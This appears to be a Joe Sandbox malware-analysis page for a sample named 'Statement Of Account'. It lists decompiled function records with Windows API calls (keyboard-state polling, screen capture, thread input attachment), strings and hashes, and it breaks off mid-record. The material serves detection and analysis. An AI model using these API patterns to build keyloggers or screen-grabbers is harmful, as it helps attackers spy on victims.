Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA

Function 00434506 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

73A0A570.USER32(00000000,?,?,?), ref: 00434585
SelectObject.GDI32(00000000,?), ref: 004345A9
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665

Strings

(, xrefs: 0043464B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: A570BitsObjectSelectStretch
String ID: (
API String ID: 4270841370-3887548279
Opcode ID: 440148b18d84eb95ba181de3259d53385060cfec68f9b8a73670629712acb2fa
Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
Opcode Fuzzy Hash: 440148b18d84eb95ba181de3259d53385060cfec68f9b8a73670629712acb2fa
Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66

Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
_wcslen.LIBCMT ref: 00450944
_wcscat.LIBCMT ref: 00450955
SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
SendMessageW.USER32(?,00001061,?,?), ref: 0045099B

Strings

-----, xrefs: 0045094F
SysListView32, xrefs: 00450893

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$Window_wcscat_wcslen
String ID: -----$SysListView32
API String ID: 4008455318-3975388722
Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65

Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00448625
CreateMenu.USER32 ref: 0044863C
SetMenu.USER32(?,00000000), ref: 0044864C
GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
IsMenu.USER32(?), ref: 004486EB
CreatePopupMenu.USER32 ref: 004486F5
InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
DrawMenuBar.USER32 ref: 00448742

Strings

0, xrefs: 0044861D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6

Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
GetDlgCtrlID.USER32(00000000), ref: 00469289
GetParent.USER32 ref: 004692A4
SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
GetDlgCtrlID.USER32(00000000), ref: 004692AE
GetParent.USER32 ref: 004692C7
SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA

Strings

ComboBox, xrefs: 004691FF
ListBox, xrefs: 00469230

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$CtrlParent$_wcslen
String ID: ComboBox$ListBox
API String ID: 2040099840-1403004172
Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9

Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
GetDlgCtrlID.USER32(00000000), ref: 00469483
GetParent.USER32 ref: 0046949E
SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
GetDlgCtrlID.USER32(00000000), ref: 004694A8
GetParent.USER32 ref: 004694C1
SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4

Strings

ComboBox, xrefs: 004693FB
ListBox, xrefs: 0046942C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$CtrlParent$_wcslen
String ID: ComboBox$ListBox
API String ID: 2040099840-1403004172
Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779

Function 004480F2 Relevance: 15.2, APIs: 10, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
_memset.LIBCMT ref: 004481BA
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$_memset
String ID:
API String ID: 1515505866-0
Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56

Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0046ED01

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

_wcscpy.LIBCMT ref: 0046ED22
VariantInit.OLEAUT32(?), ref: 0046ED88
VariantInit.OLEAUT32(?), ref: 0046ED8E
VariantInit.OLEAUT32(?), ref: 0046ED94
VariantInit.OLEAUT32(?), ref: 0046ED9A
VariantInit.OLEAUT32(?), ref: 0046EDA3
VariantInit.OLEAUT32(?), ref: 0046EDA9
VariantInit.OLEAUT32(?), ref: 0046EDB2
VariantInit.OLEAUT32(?), ref: 0046EDBB

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: InitVariant$_malloc_wcscpy_wcslen
String ID:
API String ID: 3413494760-0
Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5

Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004377D7
GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69

Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0045F81A
__wcsicoll.LIBCMT ref: 0045F836
__wcsicoll.LIBCMT ref: 0045F852
__wcsicoll.LIBCMT ref: 0045F943

Strings

DOWN, xrefs: 0045F830
0%d, xrefs: 0045F8DB
OFF, xrefs: 0045F868

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsicoll
String ID: 0%d$DOWN$OFF
API String ID: 3832890014-468733193
Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B

Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0045E959
VariantCopy.OLEAUT32(00000000), ref: 0045E963
VariantClear.OLEAUT32 ref: 0045E970
VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
__swprintf.LIBCMT ref: 0045EB1F
VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
VariantInit.OLEAUT32(00000000), ref: 0045EBE7

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0045EB19

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d
API String ID: 43541914-1568723262
Opcode ID: 14db4cabc5e1b0f67770c810f21e70b33e6c91423244c68acaef5aa9588cc2da
Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
Opcode Fuzzy Hash: 14db4cabc5e1b0f67770c810f21e70b33e6c91423244c68acaef5aa9588cc2da
Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6

Function 00474335 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

HH, xrefs: 00474359

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: HH
API String ID: 0-2761332787
Opcode ID: 42510643c9cdba6d1e7b7cb61b235febd1ff76eef9dce87624ca7f12cd0f3b2e
Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
Opcode Fuzzy Hash: 42510643c9cdba6d1e7b7cb61b235febd1ff76eef9dce87624ca7f12cd0f3b2e
Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A

Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
Sleep.KERNEL32(0000000A), ref: 0042FE6E
InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D

Strings

0vH, xrefs: 0042FF75
0vH, xrefs: 0042FF47, 00430052
@COM_EVENTOBJ, xrefs: 0042FFA0, 00430263
4RH0vH, xrefs: 004301D8

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DecrementInterlocked$Sleep
String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
API String ID: 2250217261-3412429629
Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A

Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479D1F
VariantInit.OLEAUT32(?), ref: 00479F06
VariantClear.OLEAUT32(?), ref: 00479F11
VariantInit.OLEAUT32(?), ref: 00479DF7

Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D

VariantClear.OLEAUT32(?), ref: 00479F9C

Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00479EF4
F, xrefs: 00479D1A
Null Object assignment in FOR..IN loop, xrefs: 00479D67, 00479FB3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Variant$Copy$ClearInit$ErrorLast_memset
String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 665237470-60002521
Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
